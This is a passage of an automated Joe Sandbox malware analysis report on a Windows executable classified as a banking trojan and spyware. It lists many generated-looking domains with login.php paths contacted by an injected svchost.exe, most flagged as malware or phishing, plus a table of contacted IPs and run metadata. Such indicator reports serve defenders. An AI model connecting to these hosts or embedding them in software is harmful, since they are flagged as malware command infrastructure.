                                                                                                                                                                                                          http://vopykum.com/login.phpsvchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://pumytup.com/login.phpsvchost.exe, 00000002.00000003.1743948651.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1748028273.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://ganynos.com/svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://puzypav.com/svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qexyreg.com/login.phpsvchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lymywaj.com/login.phpsvchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1832918592.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816431355.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1822071432.0000000002F28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816435063.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817764559.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qetyveq.com/login.phpsvchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937315639.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920519032.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1933122469.0000000002F60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://volyjok.com/Hsvchost.exe, 00000002.00000003.1753426788.0000000008ADF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743948651.0000000008ADF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://galyqoh.com/login.phpsvchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://cdn.ampproject.orgsvchost.exe, 00000002.00000003.1902470877.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878283204.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870864138.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1815939422.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889173906.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817804500.0000000008B08000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1867135631.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835709679.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1815939422.0000000008AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816284396.0000000008BA0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1815939422.0000000008B08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://lysysyx.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vonypic.com/login.phpsvchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gahyvuh.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://puzyduq.com/login.phpsvchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898540147.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pumybuq.com/svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://puzydal.com/login.phpsvchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838350942.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838601073.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vowyqik.com/login.phpcom/login.phpsvchost.exe, 00000002.00000003.1936983553.0000000002F32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyxysad.com/login.phpsvchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916662047.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902583004.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1901770860.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913599148.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906808351.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902913995.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pujyjol.com/login.phpsvchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vowyqyt.com/Hsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gahyhys.com/login.phpsvchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874490418.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873643375.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874254950.0000000002F28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://purywyl.com/login.phpsvchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://puryxag.com/login.phpsvchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            https://qegyhig.com/wp-json/svchost.exe, 00000002.00000003.1960203914.0000000002F71000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1619867752.0000000002F7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lykyjad.com/login.phpsvchost.exe, 00000002.00000003.1943881239.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1940238200.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vopymyc.com/login.phpsvchost.exe, 00000002.00000003.1868655611.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873699539.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868461374.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1864780566.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vojycec.com/login.phpsvchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gatyhos.com/svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gadyzib.com/svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qegytyv.com/login.phpsvchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838350942.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844445717.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838601073.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845203467.0000000002F32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyryman.com/svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vojycec.com/svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lykyjux.com/svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyryvur.com/login.phpsvchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872098357.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1882273113.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pujygug.com/login.phpsvchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1927868934.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qedyxel.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906808351.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vonydem.com/svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lysyvan.com/login.phpsvchost.exe, 00000002.00000003.1743948651.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1752892568.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1818447804.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816434149.0000000002FEA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1748028273.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyvyxyj.com/login.phpsvchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874490418.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872098357.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874254950.0000000002F28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lygyged.com/login.phpsvchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873643375.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vopycyf.com/login.phpsvchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://ganyvyw.com/login.phpsvchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902913995.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pumydyg.com/login.phpsvchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lysysir.com/login.phpsvchost.exe, 00000002.00000003.1933269002.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1936983553.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1936268348.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gatyruw.com/Hsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lymyjon.com/login.phpsvchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838350942.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://volykit.com/login.phpsvchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874490418.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872098357.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874254950.0000000002F28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyryjej.com/login.phpsvchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown

                                                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                                            Public IPs

                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                            3.94.10.34
                                                                                                                                                                                                            		lygynud.comUnited States
                                                                                                                                                                                                            		14618AMAZON-AESUSfalse
                                                                                                                                                                                                            106.15.232.163
                                                                                                                                                                                                            		unknownChina
                                                                                                                                                                                                            		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                                                                                                                                                                                            64.190.63.136
                                                                                                                                                                                                            		www.sedoparking.comUnited States
                                                                                                                                                                                                            		11696NBS11696USfalse
                                                                                                                                                                                                            72.52.179.174
                                                                                                                                                                                                            		pltraffic7.comUnited States
                                                                                                                                                                                                            		32244LIQUIDWEBUSfalse
                                                                                                                                                                                                            178.162.203.202
                                                                                                                                                                                                            		gatyfus.comGermany
                                                                                                                                                                                                            		28753LEASEWEB-DE-FRA-10DEfalse
                                                                                                                                                                                                            154.85.183.50
                                                                                                                                                                                                            		qegyval.comSeychelles
                                                                                                                                                                                                            		134548DXTL-HKDXTLTseungKwanOServiceHKfalse
                                                                                                                                                                                                            64.225.91.73
                                                                                                                                                                                                            		galynuh.comUnited States
                                                                                                                                                                                                            		14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                            99.83.170.3
                                                                                                                                                                                                            		puzylyp.comUnited States
                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                            52.34.198.229
                                                                                                                                                                                                            		lygyvuj.comUnited States
                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                            103.150.10.48
                                                                                                                                                                                                            		gtm-sg-6l13ukk0m05.qu200.comunknown
                                                                                                                                                                                                            		59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                                                                                                                                                                                                            23.253.46.64
                                                                                                                                                                                                            		gahyqah.comUnited States
                                                                                                                                                                                                            		19994RACKSPACEUSfalse
                                                                                                                                                                                                            199.191.50.83
                                                                                                                                                                                                            		galyqaz.comVirgin Islands (BRITISH)
                                                                                                                                                                                                            		40034CONFLUENCE-NETWORK-INCVGfalse
                                                                                                                                                                                                            13.248.169.48
                                                                                                                                                                                                            		pupydeq.comUnited States
                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                            103.224.212.210
                                                                                                                                                                                                            		lyxynyx.comAustralia
                                                                                                                                                                                                            		133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                                                                                                                                                                            76.223.67.189
                                                                                                                                                                                                            		qexyhuv.comUnited States
                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                            18.208.156.248
                                                                                                                                                                                                            		pupycag.comUnited States
                                                                                                                                                                                                            		14618AMAZON-AESUSfalse
                                                                                                                                                                                                            199.59.243.227
                                                                                                                                                                                                            		77026.bodis.comUnited States
                                                                                                                                                                                                            		395082BODIS-NJUSfalse
                                                                                                                                                                                                            208.100.26.245
                                                                                                                                                                                                            		lyvyxor.comUnited States
                                                                                                                                                                                                            		32748STEADFASTUSfalse
                                                                                                                                                                                                            103.224.182.252
                                                                                                                                                                                                            		vofycot.comAustralia
                                                                                                                                                                                                            		133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                                                                                                                                                                            188.114.97.3
                                                                                                                                                                                                            		lysyvan.comEuropean Union
                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                            44.221.84.105
                                                                                                                                                                                                            		gadyciz.comUnited States
                                                                                                                                                                                                            		14618AMAZON-AESUSfalse
                                                                                                                                                                                                            154.212.231.82
                                                                                                                                                                                                            		gadyniw.comSeychelles
                                                                                                                                                                                                            		133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKfalse
                                                                                                                                                                                                            188.114.96.3
                                                                                                                                                                                                            		qegyhig.comEuropean Union
                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                            General Information

                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                            Analysis ID:1553825
                                                                                                                                                                                                            Start date and time:2024-11-11 18:23:30 +01:00
                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                            Overall analysis duration:0h 11m 21s
                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                            Number of analysed new started processes analysed:28
                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                            Number of injected processes analysed:13
                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                            Sample name:Z8eHwAvqAh.exe
                                                                                                                                                                                                            renamed because original name is a hash value
                                                                                                                                                                                                            Original Sample Name:281bff88b708e81638f6c4548d0bac897a059c54.exe
                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                            Classification:mal100.bank.troj.spyw.expl.evad.winEXE@7/33@1112/23
                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                            • Successful, ratio: 98%
                                                                                                                                                                                                            • Number of executed functions: 36
                                                                                                                                                                                                            • Number of non-executed functions: 281
                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                            • Found application associated with file extension: .exe

                                                                                                                                                                                                            Warnings

                                                                                                                                                                                                            • Connection to analysis system has been lost, crash info: Unknown
                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
